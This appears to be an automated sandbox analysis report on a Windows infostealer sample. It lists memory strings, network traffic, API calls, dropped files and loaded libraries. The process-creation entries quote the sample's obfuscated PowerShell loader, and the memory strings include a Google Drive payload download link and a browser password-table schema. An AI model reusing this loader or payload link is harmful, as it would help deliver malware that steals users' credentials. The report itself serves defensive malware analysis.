Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enx
Source: powershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 0000000B.00000002.2517147937.0000000004F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 0000000B.00000002.2517147937.0000000004F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/DU
Source: msiexec.exe, 0000000B.00000002.2517147937.0000000004F9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2528121645.0000000020100000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D
Source: msiexec.exe, 0000000B.00000003.1661339544.0000000005013000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2517147937.0000000004FFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 0000000B.00000002.2517147937.0000000004F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D&export=download7
Source: msiexec.exe, 0000000B.00000002.2517147937.0000000004FFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D&export=download?
Source: msiexec.exe, 0000000B.00000003.1661339544.0000000005013000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2517147937.0000000004FFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/ek
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020B6D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020AFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020AFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020AFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020B27000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020B6D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020C75000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020C66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020C70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB
Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020C66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/x

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.7:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49854 version: TLS 1.2

Source: C:\Users\user\Desktop\87h216Snb7.exe

Code function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405705

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\87h216Snb7.exe

Jump to dropped file

Source: C:\Users\user\Desktop\87h216Snb7.exe

Code function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040351C

Source: C:\Users\user\Desktop\87h216Snb7.exe	File created: C:\Windows\resources\0809			Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	File created: C:\Windows\huzzah.lnk			Jump to behavior

Source: C:\Users\user\Desktop\87h216Snb7.exe	Code function: 0_2_00406C5F	0_2_00406C5F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_03035321	11_2_03035321
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0303D278	11_2_0303D278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0303C1A4	11_2_0303C1A4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0303C738	11_2_0303C738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0303C46C	11_2_0303C46C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0303CA08	11_2_0303CA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0303E988	11_2_0303E988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0303CFAC	11_2_0303CFAC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_03033E17	11_2_03033E17
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0303CCD8	11_2_0303CCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_03037118	11_2_03037118
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_03033AA1	11_2_03033AA1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_030339CD	11_2_030339CD
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326FC68	11_2_2326FC68
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326CCA0	11_2_2326CCA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23260B2F	11_2_23260B2F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23260B30	11_2_23260B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326EB08	11_2_2326EB08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326EF60	11_2_2326EF60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326EF51	11_2_2326EF51
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_232617A0	11_2_232617A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23268BA0	11_2_23268BA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326F3A8	11_2_2326F3A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326F3B8	11_2_2326F3B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23261795	11_2_23261795
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23268B91	11_2_23268B91
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326DE00	11_2_2326DE00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23261E7F	11_2_23261E7F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326E24D	11_2_2326E24D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326E258	11_2_2326E258
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326E6A1	11_2_2326E6A1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326E6B0	11_2_2326E6B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23261E80	11_2_23261E80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326EAFB	11_2_2326EAFB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23262968	11_2_23262968
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326D543	11_2_2326D543
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23269548	11_2_23269548
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326D550	11_2_2326D550
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326D9A8	11_2_2326D9A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326D999	11_2_2326D999
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326DDF1	11_2_2326DDF1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23265028	11_2_23265028
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326003F	11_2_2326003F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326F803	11_2_2326F803
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326F810	11_2_2326F810
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23269C18	11_2_23269C18
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23265018	11_2_23265018
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_23260040	11_2_23260040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326CC93	11_2_2326CC93
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326D0E9	11_2_2326D0E9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2326D0F8	11_2_2326D0F8

Source: 87h216Snb7.exe

Static PE information: invalid certificate

Source: 87h216Snb7.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/16@5/5

Source: C:\Users\user\Desktop\87h216Snb7.exe

0_2_0040351C

Source: C:\Users\user\Desktop\87h216Snb7.exe

Code function: 0_2_004049B1 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004049B1

Source: C:\Users\user\Desktop\87h216Snb7.exe

Code function: 0_2_004021CF CoCreateInstance,

0_2_004021CF

Source: C:\Users\user\Desktop\87h216Snb7.exe

File created: C:\Users\user\AppData\Roaming\interpellant

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_03

Source: C:\Users\user\Desktop\87h216Snb7.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsq28CA.tmp

Jump to behavior

Source: 87h216Snb7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\87h216Snb7.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\87h216Snb7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020D4E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020D1B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020D29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020D0B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020D5B000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 87h216Snb7.exe

ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\87h216Snb7.exe

File read: C:\Users\user\Desktop\87h216Snb7.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\87h216Snb7.exe "C:\Users\user\Desktop\87h216Snb7.exe"
Source: C:\Users\user\Desktop\87h216Snb7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tiltalen=$redeemership.SubString(61260,3);.$Tiltalen($redeemership)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\87h216Snb7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tiltalen=$redeemership.SubString(61260,3);.$Tiltalen($redeemership)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: fontext.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: fms.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\87h216Snb7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
